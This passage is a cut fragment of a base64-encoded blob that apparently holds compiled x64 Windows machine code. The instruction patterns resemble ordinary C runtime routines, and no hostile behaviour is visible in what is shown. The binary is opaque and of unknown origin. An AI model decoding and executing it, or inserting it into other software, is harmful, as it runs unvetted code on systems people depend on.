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w+3DBONQb9mg/gZdwRmg8EgQQ+3Eo1Cv2aD+Bl3BGaDwiBJg8ICSf/IdApmhcl0BWY7ynTKD7fCRA+3yUQryEGLwcPMzMxIhckPhAABAABTSIPsIEiL2UiLSRhIOw3E9gAAdAXoeab//0iLSyBIOw269gAAdAXoZ6b//0iLSyhIOw2w9gAAdAXoVab//0iLSzBIOw2m9gAAdAXoQ6b//0iLSzhIOw2c9gAAdAXoMab//0iLS0BIOw2S9gAAdAXoH6b//0iLS0hIOw2I9gAAdAXoDab//0iLS2hIOw2W9gAAdAXo+6X//0iLS3BIOw2M9gAAdAXo6aX//0iLS3hIOw2C9gAAdAXo16X//0iLi4AAAABIOw119gAAdAXowqX//0iLi4gAAABIOw1o9gAAdAXoraX//0iLi5AAAABIOw1b9gAAdAXomKX//0iDxCBbw8zMSIXJdGZTSIPsIEiL2UiLCUg7DaX1AAB0Behypf//SItLCEg7DZv1AAB0Behgpf//SItLEEg7DZH1AAB0BehOpf//SItLWEg7Dcf1AAB0Beg8pf//SItLYEg7Db31AAB0Begqpf//SIPEIFvDSIXJD4TwAwAAU0iD7CBIi9lIi0kI6Aql//9Ii0sQ6AGl//9Ii0sY6Pik//9Ii0sg6O+k//9Ii0so6Oak//9Ii0sw6N2k//9Iiwvo1aT//0iLS0DozKT//0iLS0jow6T//0iLS1DouqT//0iLS1josaT//0iLS2DoqKT//0iLS2jon6T//0iLSzjolqT//0iLS3DojaT//0iLS3johKT//0iLi4AAAADoeKT//0iLi4gAAADobKT//0iLi5AAAADoYKT//0iLi5gAAADoVKT//0iLi6AAAADoSKT//0iLi6gAAADoPKT//0iLi7AAAADoMKT//0iLi7gAAADoJKT//0iLi8AAAADoGKT//0iLi8gAAADoDKT//0iLi9AAAADoAKT//0iLi9gAAADo9KP//0iLi+AAAADo6KP//0iLi+gAAADo3KP//0iLi/AAAADo0KP//0iLi/gAAADoxKP//0iLiwABAADouKP//0iLiwgBAADorKP//0iLixABAADooKP//0iLixgBAADolKP//0iLiyABAADoiKP//0iLiygBAADofKP//0iLizABAADocKP//0iLizgBAADoZKP//0iLi0ABAADoWKP//0iLi0gBAADoTKP//0iLi1ABAADoQKP//0iLi2gBAADoNKP//0iLi3ABAADoKKP//0iLi3gBAADoHKP//0iLi4ABAADoEKP//0iLi4gBAADoBKP//0iLi5ABAADo+KL//0iLi2ABAADo7KL//0iLi6ABAADo4KL//0iLi6gBAADo1KL//0iLi7ABAADoyKL//0iLi7gBAADovKL//0iLi8ABAADosKL//0iLi8gBAADopKL//0iLi5gBAADomKL//0iLi9ABAADojKL//0iLi9gBAADogKL//0iLi+ABAADodKL//0iLi+gBAADoaKL//0iLi/ABAADoXKL//0iLi/gBAADoUKL//0iLiwACAADoRKL//0iLiwgCAADoOKL//0iLixACAADoLKL//0iLixgCAADoIKL//0iLiyACAADoFKL//0iLiygCAADoCKL//0iLizACAADo/KH//0iLizgCAADo8KH//0iLi0ACAADo5KH//0iLi0gCAADo2KH//0iLi1ACAADozKH//0iLi1gCAADowKH//0iLi2ACAADotKH//0iLi2gCAADoqKH//0iLi3ACAADonKH//0iLi3gCAADokKH//0iLi4ACAADohKH//0iLi4gCAADoeKH//0iLi5ACAADobKH//0iLi5gCAADoYKH//0iLi6ACAADoVKH//0iLi6gCAADoSKH//0iLi7ACAADoPKH//0iLi7gCAADoMKH//0iDxCBbw8zMQFVBVEFVQVZBV0iD7FBIjWwkQEiJXUBIiXVISIl9UEiLBe7iAABIM8VIiUUIi11gM/9Ni+FFi+hIiVUAhdt+KkSL00mLwUH/ykA4OHQMSP/ARYXSdfBBg8r/i8NBK8L/yDvDjVgBfAKL2ESLdXiL90WF9nUHSIsBRItwBPedgAAAAESLy02LxBvSQYvOiXwkKIPiCEiJfCQg/8L/FaMxAABMY/iFwHUHM8Dp+QEAAEm48P///////w+FwH5hM9JIjULgSff3SIP4AnJSSo0MfRAAAABIgfkABAAAdypIjUEPSDvBdwNJi8BIg+Dw6MIWAABIK+BIjXwkQEiF/3SpxwfMzAAA6xPoTKH//0iL+EiFwHQKxwDd3QAASIPHEEiF/3SFRIvLTYvEugEAAABBi85EiXwkKEiJfCQg/xUDMQAAhcAPhEwBAABMi2UAI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